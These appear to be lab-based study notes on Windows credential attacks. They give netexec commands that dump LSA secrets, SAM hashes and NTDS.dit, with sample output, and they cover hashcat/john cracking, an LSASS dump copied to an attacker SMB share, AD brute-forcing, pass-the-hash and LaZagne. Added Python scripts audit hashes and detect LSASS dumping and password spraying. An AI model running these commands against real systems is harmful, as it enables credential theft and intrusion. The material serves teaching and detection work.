Windows Authentication Process

The Windows client authentication process consists of many different modules that perform the entire logon, retrieval, and verification processes. In addition, there are many different and complex authentication procedures on the Windows system, such as Kerberos authentication. The Local Security Authority (LSA) is a protected subsystem that authenticates users and logs them into the local computer. In addition, the LSA maintains information about all aspects of local security on a computer. It also provides various services for translating between names and security IDs (SIDs).

[Figure: windows_auth (Windows authentication process). Source: HackTheBox]

Local interactive logon is performed by the interaction between the logon process (WinLogon), the logon user interface process (LogonUI), the credential providers, LSASS, one or more authentication packages, and SAM or Active Directory.

Winlogon is a trusted process responsible for managing security-related user interactions. These include:

  • Launching LogonUI to enter passwords at login
  • Changing passwords
  • Locking and unlocking the workstation

Attacking SAM

The Security Accounts Manager (SAM) is a database file in Windows operating systems that stores users’ passwords. It can be found in the C:\Windows\System32\config directory. The SAM file is encrypted using a locally stored key. The key is stored in the registry at HKEY_LOCAL_MACHINE\Security\SAM\Domains\Account.

Dumping LSA Secrets Remotely

netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
 
SMB         10.129.42.198   445    WS01     [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01     [+] WS01\bob:HTB_@cademy_stdnt!(Pwn3d!)
SMB         10.129.42.198   445    WS01     [+] Dumping LSA secrets
SMB         10.129.42.198   445    WS01     WS01\worker:Hello123
SMB         10.129.42.198   445    WS01      dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce
dpapi_userkey:0x50b9fa0fd79452150111357308748f7ca101944a
SMB         10.129.42.198   445    WS01     NL$KM:e4fe184b25468118bf23f5a32ae836976ba492b3a432deb3911746b8ec63c451a70c1826e9145aa2f3421b98ed0cbd9a0c1a1befacb376c590fa7b56ca1b488b
SMB         10.129.42.198   445    WS01     [+] Dumped 3 LSA secrets to /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.secrets and /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.cached
 

Dumping the SAM Database Remotely

netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam
 
SMB         10.129.42.198   445    WS01      [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:WS01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01      [+] FRONTDESK01\bob:HTB_@cademy_stdnt! (Pwn3d!)
SMB         10.129.42.198   445    WS01      [+] Dumping SAM hashes
SMB         10.129.42.198   445    WS01      Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:72639bbb94990305b5a015220f8de34e:::
SMB         10.129.42.198   445    WS01     bob:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
SMB         10.129.42.198   445    WS01     sam:1002:aad3b435b51404eeaad3b435b51404ee:a3ecf31e65208382e23b3420a34208fc:::
SMB         10.129.42.198   445    WS01     rocky:1003:aad3b435b51404eeaad3b435b51404ee:c02478537b9727d391bc80011c2e2321:::
SMB         10.129.42.198   445    WS01     worker:1004:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
SMB         10.129.42.198   445    WS01     [+] Added 8 SAM hashes to the database

Cracking Hashes

We can crack NTLM hashes using both hashcat and john. Below are examples for each tool:

  • Using hashcat:

    hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
  • Using john:

    john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
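The --sam output above is in pwdump format (user:RID:LM hash:NT hash:::), and hashcat mode 1000 works because an NT hash is nothing more than MD4 over the UTF-16LE password with no salt. The script below is an added example written for these notes; it is not code from HackTheBox, netexec or hashcat. It re-implements MD4 from RFC 1320 (hashlib's md4 is frequently disabled under OpenSSL 3), parses the dump format, reports the two hygiene findings a defender wants from such a dump (accounts whose NT hash is the empty-password value and accounts that still store a legacy LM hash), and performs the same hash-and-compare that hashcat -m 1000 -a 0 does against a small constructed candidate list. The four dump lines are copied from the output above; the candidate passwords are constructed.

```python
import re
import struct

# Marker values seen in pwdump-style output (user:RID:LM:NT:::).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored (the modern default)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4 of the empty string: blank password or disabled built-in


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, re-implemented because hashlib's md4 is often disabled under OpenSSL 3."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1: F(b,c,d) = (b AND c) OR (NOT b AND d)
            f = (b & c) | (~b & d)
            a = _rotl((a + f + x[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G(b,c,d) = majority(b, c, d), message words taken column-wise
            g = (b & c) | (b & d) | (c & d)
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g + x[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H(b,c,d) = b XOR c XOR d
            h = b ^ c ^ d
            a = _rotl((a + h + x[r3_order[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)). There is no salt, so equal passwords give equal hashes."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str) -> list:
    """Parse user:RID:LM:NT::: lines as printed by netexec --sam / --ntds; other lines are ignored."""
    accounts = []
    for line in text.splitlines():
        m = re.match(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$", line.strip())
        if m:
            accounts.append({"user": m.group(1), "rid": int(m.group(2)),
                             "lm": m.group(3).lower(), "nt": m.group(4).lower()})
    return accounts


def audit(accounts: list) -> dict:
    """Hygiene findings from a dump: blank passwords and legacy LM hashes still being stored."""
    findings = {"blank_password": [], "lm_hash_stored": []}
    for acct in accounts:
        if acct["nt"] == EMPTY_NT:   # cross-check with account status: disabled built-ins look the same
            findings["blank_password"].append(acct["user"])
        if acct["lm"] != EMPTY_LM:   # LM hashes are trivially reversible; NoLMHash should be enforced
            findings["lm_hash_stored"].append(acct["user"])
    return findings


def match_wordlist(accounts: list, candidates: list) -> dict:
    """What hashcat -m 1000 -a 0 does: hash each candidate once, compare against every NT hash."""
    table = {nt_hash(p): p for p in candidates}
    return {a["user"]: table[a["nt"]] for a in accounts if a["nt"] in table}


# Four lines copied from the --sam output above.
SAM_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
worker:1004:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
"""
CANDIDATES = ["Hello123", "Password123", "Winter2022!"]  # constructed mini-wordlist

if __name__ == "__main__":
    accts = parse_pwdump(SAM_DUMP)
    print(audit(accts))
    print(match_wordlist(accts, CANDIDATES))
```

Because the NT hash is unsalted, a single MD4 per candidate tests that candidate against every account at once, which is why a full rockyou pass over a SAM or NTDS dump finishes in seconds; it is also why a dumped NT hash must be treated as equivalent to the password itself (see the pass-the-hash step later in these notes).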

Dumping and Attacking LSASS

To dump the LSASS process, use Task Manager:

[Figure: lsass_dump (dumping the LSASS process from Task Manager)]

The dump file will be saved in the following location:

C:\Users\<loggedonuser>\AppData\Local\Temp

Transferring Files through Shares

  1. Create a share folder named CompData:

    impacket-smbserver -smb2support CompData /home/huy/Documents/
  2. Move the LSASS dump to the share folder:

    move C:\Users\<loggedonuser>\AppData\Local\Temp\lsass.DMP \\10.10.16.19\CompData

To extract credentials from the dump, use pypykatz:

pypykatz lsa minidump /home/huy/Documents/lsass.DMP
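From the detection side, both steps of the procedure above leave distinctive traces: Task Manager (or any other tool) must open lsass.exe with at least PROCESS_QUERY_INFORMATION and PROCESS_VM_READ rights, which Sysmon records as Event ID 10 (ProcessAccess), and the resulting lsass.DMP is a file creation (Sysmon Event ID 11). The script below is an added example for these notes, not part of the original page or of Sysmon; it runs a simple rule over constructed, simplified Sysmon records (made-up paths and times) and flags LSASS memory reads by images outside an assumed allowlist, plus any lsass*.dmp file being written. The allowlist is an assumption and has to be tuned per environment.

```python
import re

# Process access rights from winnt.h; a minidump of LSASS needs at least QUERY_INFORMATION + VM_READ.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
DUMP_RIGHTS = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION

# Assumed allowlist of images that legitimately read LSASS memory; tune this per environment.
ASSUMED_BENIGN_SOURCES = {"msmpeng.exe", "csrss.exe", "wininit.exe"}

# Constructed, simplified Sysmon records: "<EventID>|key=value|key=value...".
# Event 10 = ProcessAccess, Event 11 = FileCreate. Paths and times are made up for the example.
SAMPLE_EVENTS = [
    "10|UtcTime=2022-02-07 15:56:01|SourceImage=C:\\Windows\\System32\\svchost.exe"
    "|TargetImage=C:\\Windows\\system32\\lsass.exe|GrantedAccess=0x1000",
    "10|UtcTime=2022-02-07 15:56:12|SourceImage=C:\\Windows\\System32\\Taskmgr.exe"
    "|TargetImage=C:\\Windows\\system32\\lsass.exe|GrantedAccess=0x1FFFFF",
    "11|UtcTime=2022-02-07 15:56:14|Image=C:\\Windows\\System32\\Taskmgr.exe"
    "|TargetFilename=C:\\Users\\bob\\AppData\\Local\\Temp\\lsass.DMP",
    "10|UtcTime=2022-02-07 15:57:30|SourceImage=C:\\Windows\\System32\\Taskmgr.exe"
    "|TargetImage=C:\\Windows\\System32\\notepad.exe|GrantedAccess=0x1410",
    "10|UtcTime=2022-02-07 15:58:02|SourceImage=C:\\ProgramData\\Defender\\MsMpEng.exe"
    "|TargetImage=C:\\Windows\\system32\\lsass.exe|GrantedAccess=0x1410",
]


def parse_event(line: str) -> dict:
    event_id, _, rest = line.partition("|")
    fields = dict(kv.split("=", 1) for kv in rest.split("|"))
    fields["EventID"] = int(event_id)
    return fields


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_lsass_dumping(lines, benign_sources=ASSUMED_BENIGN_SOURCES) -> list:
    """Flag (a) processes opening lsass.exe with dump-capable rights and (b) lsass*.dmp files being written."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev["EventID"] == 10 and basename(ev["TargetImage"]) == "lsass.exe":
            granted = int(ev["GrantedAccess"], 16)
            src = basename(ev["SourceImage"])
            # Parenthesised on purpose: '==' binds tighter than '&' in Python.
            if (granted & DUMP_RIGHTS) == DUMP_RIGHTS and src not in benign_sources:
                alerts.append({"time": ev["UtcTime"], "rule": "lsass_memory_read",
                               "source": ev["SourceImage"], "granted": hex(granted)})
        elif ev["EventID"] == 11 and re.search(r"^lsass.*\.dmp$", basename(ev["TargetFilename"])):
            alerts.append({"time": ev["UtcTime"], "rule": "lsass_dump_file_written",
                           "source": ev["Image"], "file": ev["TargetFilename"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_lsass_dumping(SAMPLE_EVENTS):
        print(alert)
```

The access-mask check matters more than matching on 0x1FFFFF alone: Task Manager asks for full access, but other dumpers request only the minimum (0x1410 is common), so the rule tests for the two rights a dump actually needs. Enabling LSA protection (RunAsPPL) blocks these reads outright rather than merely logging them.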

Attacking Active Directory & NTDS.dit

Active Directory (AD) is widely used in enterprise networks. Understanding how to attack AD environments is essential since many organizations use it to manage Windows systems.

Creating a Custom List of Usernames or Passwords

Suppose you have collected the following employee names from the company's website:

  • Ben Williamson
  • Bob Burgerstein
  • Jim Stevenson

You can generate username and password lists as follows:

# Generate usernames
./username-anarchy -i /home/ltnbob/names.txt
 
# Generate passwords
hashcat --force pass.list -r custom.rule --stdout | sort -u > mut_pass.list

Brute-Forcing Active Directory

  • Brute-force AD with netexec:

    netexec smb 10.129.201.57 -u bob -p /usr/share/wordlists/rockyou.txt
  • Brute-force AD with msfconsole:

    msf6 > use auxiliary/scanner/smb/smb_login
    ...
    msf6 auxiliary(scanner/smb/smb_login) > exploit
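Either brute-force above produces a burst of Security event 4625 (failed logon) entries on the domain controller: the netexec run with a wordlist generates many failures against one account from one source, while trying one password across a list of usernames generates one failure per account from the same source. The script below is an added example for these notes, not code from the original page or from netexec/Metasploit; it applies sliding-window counts to constructed 4625 extracts (made-up times; the attacker address is the 10.10.16.19 box used elsewhere in these notes) and raises one alert per pattern. The thresholds and window are assumptions to tune; on a domain the same burst also trips the account lockout policy (event 4740), which is the usual first indicator.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed extracts of Security event 4625 (An account failed to log on).
# SubStatus 0xC000006A = wrong password, 0xC0000064 = user name does not exist.
SAMPLE_4625 = [
    "2022-02-07T16:00:01 TargetUserName=bob IpAddress=10.10.16.19 SubStatus=0xC000006A",
    "2022-02-07T16:00:03 TargetUserName=bob IpAddress=10.10.16.19 SubStatus=0xC000006A",
    "2022-02-07T16:00:05 TargetUserName=bob IpAddress=10.10.16.19 SubStatus=0xC000006A",
    "2022-02-07T16:00:07 TargetUserName=bob IpAddress=10.10.16.19 SubStatus=0xC000006A",
    "2022-02-07T16:00:09 TargetUserName=bob IpAddress=10.10.16.19 SubStatus=0xC000006A",
    "2022-02-07T16:00:11 TargetUserName=bob IpAddress=10.10.16.19 SubStatus=0xC000006A",
    "2022-02-07T16:03:40 TargetUserName=alice IpAddress=10.129.201.10 SubStatus=0xC000006A",  # a single typo
    "2022-02-07T16:10:00 TargetUserName=ben IpAddress=10.10.16.19 SubStatus=0xC000006A",
    "2022-02-07T16:10:02 TargetUserName=jim IpAddress=10.10.16.19 SubStatus=0xC000006A",
    "2022-02-07T16:10:04 TargetUserName=sam IpAddress=10.10.16.19 SubStatus=0xC000006A",
    "2022-02-07T16:10:06 TargetUserName=admin IpAddress=10.10.16.19 SubStatus=0xC0000064",
]


def parse_4625(line: str) -> dict:
    stamp, *kvs = line.split()
    ev = dict(kv.split("=", 1) for kv in kvs)
    return {"time": datetime.fromisoformat(stamp), "user": ev["TargetUserName"].lower(),
            "ip": ev["IpAddress"], "substatus": ev["SubStatus"]}


def detect_logon_failures(lines, window=timedelta(minutes=5), per_account=5, per_source_accounts=3) -> list:
    """Sliding-window counts: many failures on one account = brute force;
    one source failing against many accounts = password spray. Thresholds are assumptions to tune."""
    events = sorted((parse_4625(l) for l in lines), key=lambda e: e["time"])
    by_account = defaultdict(deque)   # user -> timestamps of recent failures
    by_source = defaultdict(deque)    # ip   -> (timestamp, user) of recent failures
    alerts, fired = [], set()
    for ev in events:
        t = ev["time"]
        q = by_account[ev["user"]]
        q.append(t)
        while t - q[0] > window:      # drop failures that fell out of the window
            q.popleft()
        if len(q) >= per_account and ("bruteforce", ev["user"]) not in fired:
            fired.add(("bruteforce", ev["user"]))
            alerts.append({"rule": "password_bruteforce", "account": ev["user"], "source": ev["ip"],
                           "failures": len(q), "time": t.isoformat()})
        s = by_source[ev["ip"]]
        s.append((t, ev["user"]))
        while t - s[0][0] > window:
            s.popleft()
        targets = {u for _, u in s}
        if len(targets) >= per_source_accounts and ("spray", ev["ip"]) not in fired:
            fired.add(("spray", ev["ip"]))
            alerts.append({"rule": "password_spray", "source": ev["ip"], "accounts": len(targets),
                           "time": t.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_logon_failures(SAMPLE_4625):
        print(alert)
```

Counting distinct target accounts per source, rather than raw failures, is what separates a spray from ordinary mistyped passwords: alice's single failure never trips either rule, while the 10.10.16.19 source is caught once it has touched three accounts even though each account saw only one failure.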

To capture the NTDS.dit file:

netexec smb 10.129.201.57 -u bob -p password --ntds

If hash cracking fails, pass the NT hash directly instead (pass-the-hash):

evil-winrm -i 10.129.201.57 -u Administrator -H "64f12cddaa88057e06a81b54e73b949b"

Credential Hunting in Windows

Use LaZagne to extract credentials:

# Extract all credentials
lazagne.exe all
 
# Extract from specific modules
lazagne.exe browsers

Additionally, use findstr to search for passwords in files:

C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml